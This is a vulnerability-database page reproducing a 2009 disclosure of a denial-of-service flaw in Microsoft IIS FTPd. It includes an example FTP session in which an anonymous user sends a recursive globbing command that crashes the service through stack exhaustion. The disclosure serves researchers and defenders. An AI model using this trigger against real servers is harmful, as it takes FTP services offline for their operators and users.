Lucene search
K

Microsoft IIS FTPd Denial Of Service

🗓️ 04 Sep 2009 00:00:00Reported by KingcopeType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 21 Views

Microsoft IIS FTPD Denial Of Service vulnerability in globbing functionality allows anonymous and normal users to trigger stack overflow, causing FTP service crash

Code
`***** MS IIS FTPD DoS ZER0DAY *****  
  
There is a DoS vulnerability in the globbing functionality of IIS FTPD.  
Anonymous users can exploit this if they have read access to a directory!!!  
Normal users can exploit this too if they can read a directory.  
  
Example session where the anonymous user has read access to the folder "pub":  
  
C:\Users\Nikolaos>ftp 192.168.2.102  
Verbindung mit 192.168.2.102 wurde hergestellt.  
220 Microsoft FTP Service  
Benutzer (192.168.2.102:(none)): ftp  
331 Anonymous access allowed, send identity (e-mail name) as password.  
Kennwort:  
230 Anonymous user logged in.  
ftp> ls "-R p*/../"  
...  
p*/../pub:  
pub  
...  
p*/../pub:  
pub  
...  
p*/../pub:  
pub  
...  
p*/../pub:  
pub  
...  
Verbindung beendet durch Remotehost. (MEANS: Remote Host has closed  
the connection)  
ftp>  
ftp>  
  
By looking into my debugging session with OllyDbg I see that an  
exception is raised and  
the ftp service crashes due to a "stack overflow", what is a stack exhaustion.  
If the ftp service is set to "manual" startup in services control  
manager the service  
needs to be restarted manually.  
IIS 5.0 and 6.0 were tested and are affected.  
  
Best Regards,  
  
Nikolaos Rangos  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation